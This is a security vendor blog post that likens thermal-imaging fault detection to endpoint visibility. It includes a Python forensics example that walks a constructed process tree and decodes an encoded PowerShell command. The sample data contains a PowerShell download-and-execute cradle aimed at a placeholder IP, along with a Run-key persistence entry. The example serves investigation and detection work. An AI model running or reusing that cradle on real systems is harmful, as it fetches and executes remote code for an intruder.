
A Condition Monitoring Approach to Cyber Security, Part 2 – Visibility is Key

April 13, 2015 / Dave Brown
Figure 1: Hotspot indicating a fault at an electrical substation

To a plant maintenance engineer, the chance that a project might “blow up” is more than just a figure of speech—it’s a real-life risk. So we can be sure that these maintenance managers take their jobs very seriously. In this blog series we will explore some of the lessons we can learn from the approach plant maintenance engineers take in doing their jobs.

Lesson 2: Seeing is believing – the importance of visibility

In part one of this blog series, we discussed how, in the world of plant maintenance, the notion of routine maintenance was supplanted by condition monitoring and how that paralleled the effectiveness of a detection/response approach to security (versus relying on a traditional antivirus tool for protection). In this blog, we will explore what the field of condition monitoring has to teach us about why visibility should take priority over detection.

There are many ways to detect a fault on a typical manufacturing plant floor. Low-tech methods might be as mundane as visual inspection for leaky pipe joints, “sniff tests” for burning insulation, or touching a motor casing to see if it’s running hot.

Advancements in technology led to both the need for – and availability of – more precise means of detecting faults – technologies such as vibration analysis, ultrasound, oil analysis, etc. But even these technologies had their limitations, either in scope or in practicality. Many of them required machinery (or circuits) to be shut down or even disassembled in order to be tested. Certain testing methods actually required the destruction of a sample. These limitations rendered many of the early testing techniques either too costly, too time-consuming, or otherwise too impractical for most plants to implement.

New kids on the block – Thermal Imagers

For many plants, this changed when companies such as FLIR began offering portable infrared thermal-imaging cameras. A manufacturer could then equip its maintenance staff with a device that let them safely see faults with their own eyes, without taking equipment offline.

How it works – Everything Glows

Our eyes can only see objects that are hot enough to glow in the visible portion of the electromagnetic spectrum (such as red-hot iron), but cooler objects also “glow” in the infrared, where the naked eye cannot see them. Infrared thermal imagers convert that infrared “glow” into the visible range, with different colors representing different temperature ranges.

The advantages of thermal imaging over older methods are both wide-ranging and compelling:

1) Reduced response time

2) Better access

3) More detail

4) Facilitated root-cause analysis

Figure 2: Thermal imaging dramatically reduces the time it takes to find exactly which circuit in a breaker panel has a faulty connection.

Thermal imaging provides visibility where there was none before. While other forms of testing might alert us to the existence of a problem (detection), thermal imaging also can inform us of its source and nature.

What does that have to do with information security?

In information security, visibility is key. Detection tools have their place, but simply knowing that a problem exists is of limited value. To respond effectively to a breach, we must understand an attack’s source and scope, and only visibility into everything that is running in the environment gives us that understanding.


The Carbon Black screenshot that accompanies this post shows the process tree leading up to the current instance of powershell.exe, together with its user, host and command line. Carbon Black also displays publisher information, correlated third-party threat intelligence, and a list of significant metadata events, such as file modifications, registry modifications, network connections, and child processes. Having this visibility in your environment provides benefits similar to those of thermal imaging on a factory floor, including:

  1. Quicker investigations: Visibility fills in the gaps between detection events, so an investigation that would take a traditional forensics approach hours or even days (if it could be completed at all) can be finished in minutes.
  2. Better access: With the centralized console that a visibility product provides, it is no longer necessary to have direct access to a compromised machine, and there are no shipping or travelling expenses associated with an investigation.
  3. Greater level of detail: Having the relationships between all of the metadata and events associated with every executed process gives a much higher level of confidence in an investigation’s findings.
  4. Root cause: A recorded history of every process that has run (for as long as the sensor data is retained) lets you “rewind the tape,” so you can respond to the true root cause rather than just the detected events.
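To make the “rewind the tape” idea concrete, here is an added example in Python. It is not Carbon Black code: the sensor records, event types and field names are constructed for illustration, modelled on the fields named above (process, user, host, command line, file/registry/network/child-process events). It walks the ancestry of a powershell.exe instance back to its root, lists every recorded event along that chain so the analyst can see what preceded the detected event, and decodes the base64/UTF-16LE payload behind a -EncodedCommand switch so the command line is actually readable.

```python
"""Walk a recorded process tree back to its root cause.

Added example for this post; not Carbon Black code. The sensor records,
event types and field names below are constructed for illustration.
"""
import base64
import binascii
import re
from collections import defaultdict

# The script hidden in the PowerShell command line (constructed). Its encoded
# form is built here so the decoder below can be checked against the original.
SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')"
ENCODED = base64.b64encode(SCRIPT.encode("utf-16-le")).decode("ascii")

# Constructed process records for one host, as a sensor would report them.
PROCESSES = [
    {"pid": 700,  "ppid": 0,    "name": "explorer.exe",   "user": "CORP\\alice", "host": "WS-042",
     "cmdline": "C:\\Windows\\explorer.exe"},
    {"pid": 2200, "ppid": 700,  "name": "outlook.exe",    "user": "CORP\\alice", "host": "WS-042",
     "cmdline": "\"C:\\Program Files\\Microsoft Office\\OUTLOOK.EXE\""},
    {"pid": 3100, "ppid": 2200, "name": "winword.exe",    "user": "CORP\\alice", "host": "WS-042",
     "cmdline": "WINWORD.EXE /n \"C:\\Users\\alice\\Downloads\\invoice.docm\""},
    {"pid": 3144, "ppid": 3100, "name": "cmd.exe",        "user": "CORP\\alice", "host": "WS-042",
     "cmdline": "cmd.exe /c powershell.exe -nop -w hidden -enc " + ENCODED},
    {"pid": 3160, "ppid": 3144, "name": "powershell.exe", "user": "CORP\\alice", "host": "WS-042",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED},
]

# Constructed metadata events, in the order the sensor recorded them.
EVENTS = [
    {"pid": 2200, "type": "filemod",   "detail": "C:\\Users\\alice\\Downloads\\invoice.docm"},
    {"pid": 3160, "type": "netconn",   "detail": "198.51.100.7:80"},
    {"pid": 3160, "type": "filemod",   "detail": "C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe"},
    {"pid": 3160, "type": "regmod",    "detail": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater"},
    {"pid": 3160, "type": "childproc", "detail": "C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe"},
]


def index_processes(processes):
    """Build pid -> record and ppid -> [child pids] lookups."""
    by_pid = {p["pid"]: p for p in processes}
    children = defaultdict(list)
    for p in processes:
        children[p["ppid"]].append(p["pid"])
    return by_pid, children


BY_PID, CHILDREN = index_processes(PROCESSES)


def ancestor_pids(pid, by_pid=BY_PID):
    """Pids from the root ancestor down to pid. A seen-set guards against a
    cycle caused by pid reuse in recorded data; an unknown pid yields []."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def ancestry(pid, by_pid=BY_PID):
    """Process names root-first: the 'rewind the tape' view of one process."""
    return [by_pid[p]["name"] for p in ancestor_pids(pid, by_pid)]


def events_along_chain(pid, by_pid=BY_PID, events=EVENTS):
    """Every recorded event on pid and on each of its ancestors, root first,
    as (process name, event type, detail) tuples."""
    out = []
    for p in ancestor_pids(pid, by_pid):
        out.extend((by_pid[p]["name"], e["type"], e["detail"]) for e in events if e["pid"] == p)
    return out


def decode_encoded_command(cmdline):
    """Recover the script behind -EncodedCommand (base64 of UTF-16LE text).

    PowerShell accepts any unambiguous prefix of the switch; the common
    spellings (-e, -ec, -en, -enc, -encodedcommand) are matched here.
    Returns None when no switch is present or the payload does not decode.
    """
    m = re.search(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


if __name__ == "__main__":
    target = 3160
    print("chain:", " -> ".join(ancestry(target)))
    print("user/host:", BY_PID[target]["user"], BY_PID[target]["host"])
    print("decoded:", decode_encoded_command(BY_PID[target]["cmdline"]))
    for name, kind, detail in events_along_chain(target):
        print(f"{name:16} {kind:10} {detail}")
```

Run it and the chain reads explorer.exe, outlook.exe, winword.exe, cmd.exe, powershell.exe, with Outlook’s write of invoice.docm listed before PowerShell’s network connection: the detected event is the download, the root cause is the macro document that arrived by mail. The decoder only matches the common spellings of the switch; because PowerShell accepts any unambiguous prefix of -EncodedCommand, a parser used in production should be tested against the variants actually seen in the environment.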

Additional Benefits

Once the benefit of thermal imaging had been proven in condition monitoring, many other applications emerged, such as medical imaging, building inspection and R&D. Likewise, a tool that provides visibility across all of the computers in your enterprise can deliver benefits beyond detection and response, such as vulnerability/risk assessment, software license management, and file integrity monitoring/control.

Whether looking for hotspots around a manufacturing plant floor or malicious activity in your computer environment, visibility is key.

In our next post, we will explore how condition monitoring can help enhance our risk assessment strategy.
